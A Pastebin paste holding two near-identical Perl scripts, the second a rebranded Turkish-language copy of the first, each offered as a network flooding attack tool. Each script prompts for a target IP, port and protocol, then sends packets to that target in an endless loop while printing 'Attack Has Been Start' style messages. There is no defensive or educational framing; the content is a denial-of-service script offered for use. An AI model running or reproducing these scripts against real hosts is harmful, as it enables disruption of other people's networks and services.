Advertisement
Guest User

Untitled

a guest
Jun 21st, 2018
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.45 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. use IO::Socket;
  4.  
  5. system("clear || cls");
  6. #Script Banner================================================================
  7. print q{
  8. .-" "-.
  9. / \
  10. | JOKER11 |
  11. |, .-. .-. ,|
  12. | )(__/ \__)( |
  13. |/ /\ \|
  14. (@_ (_ ^^ _)
  15. _ ) \_______\__|IIIIII|__/__________________________
  16. (_)@8@8{}<________|-\IIIIII/-|_A_N_O_N_Y_M_O_U_S_A_R_A_B_>
  17. )_/ \ /
  18. (@ `--------` Welcome!
  19. [---] by:> OSEID ALDARY [---]
  20. [---] Version:> 1.5 [---]
  21. };
  22. # INPUT TARGET INFO ==============================================
  23. print "\n===============================";
  24. print "\n Enter TargetIP: "; # Set Target IP
  25. chop ($host = <stdin>);
  26. print "===============================";
  27. print "\n Enter Port: "; # Set Port
  28. chop ($port = <stdin>);
  29. print "===============================";
  30. print "\n Enter Protockol (TCP or UDP) :"; # Set Protockol
  31. chop ($proto = <stdin>);
  32. system("clear || cls");
  33. print "\n[*]Attack Has Been Start On [$host:$port] proto => [$proto].......\n\n";
  34. sleep 3;
  35.  
  36. {
  37. $sock = IO::Socket::INET->new (
  38. PeerAddr => $host,
  39. PeerPort => $port,
  40. Proto => "$proto" ) || die "\n start Attack !";
  41.  
  42.  
  43. }
  44. packets:
  45. while (1) {
  46. $size = rand() * 8921873 * 99919988;
  47. print (" Packets sent: $size\n");
  48. send($sock, 999999999999999999999999999, $size);
  49. packets2:
  50. $size = rand() * 8921873 * 99919988 * 2;
  51. print "Flooding:";
  52. send($sock, 999999999999999999999999999, $size);
  53. packet3:
  54. $size = rand() * 8921873 * 99919988 * 2 + 99919988;
  55. print " (=>$host:$port~$proto<=)";
  56. send($sock, $size, $size); # Attack start################
  57.  
  58. }
  59.  
  60.  
  61. ##############################################################
  62. ##################### #########################
  63. ##################### END OF SCRIPT #########################
  64. ##################### #########################
  65. ##############################################################
  66. #This Script by Oseid Aldary
  67. #Have a nice day :)
  68. #GoodBye
  69. --------------------------------------------------------------------------------------------------------------------------
  70. #!/usr/bin/perl
  71.  
  72. use IO::Socket;
  73.  
  74. system("clear || cls");
  75. print q{
  76. ::::::::::::::::::
  77. TobsterBG the best
  78. TobsterBG the best
  79. TobsterBG the best
  80. TobsterBG the best
  81. TobsterBG the best
  82. ::::::::::::::::::
  83. [---] by:> TobsterBG <:by [---]
  84. [---] year:> 2018 <:year [---]
  85. };
  86. print "\n===============================";
  87. print "\n Karsi tarafin ip-sini gir: ";
  88. chop ($host = <stdin>);
  89. print "===============================";
  90. print "\n port-unu gir: ";
  91. chop ($port = <stdin>);
  92. print "===============================";
  93. print "\n birisini sec (TCP veya UDP) :";
  94. chop ($proto = <stdin>);
  95. system("clear || cls");
  96. print "\n[*] Saldiri Basladi [$host:$port] proto => [$proto].......\n\n";
  97. sleep 3;
  98.  
  99. {
  100. $sock = IO::Socket::INET->new (
  101. PeerAddr => $host,
  102. PeerPort => $port,
  103. Proto => "$proto" ) || die "\n start Attack !";
  104.  
  105.  
  106. }
  107. packets:
  108. while (1) {
  109. $size = rand() * 8921873 * 99919988;
  110. print (" Packets sent: $size\n");
  111. send($sock, 999999999999999999999999999, $size);
  112. packets2:
  113. $size = rand() * 8921873 * 99919988 * 2;
  114. print "Flooding:";
  115. send($sock, 999999999999999999999999999, $size);
  116. packet3:
  117. $size = rand() * 8921873 * 99919988 * 2 + 99919988;
  118. print " (=>$host:$port~$proto<=)";
  119. send($sock, $size, $size);
  120.  
  121. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement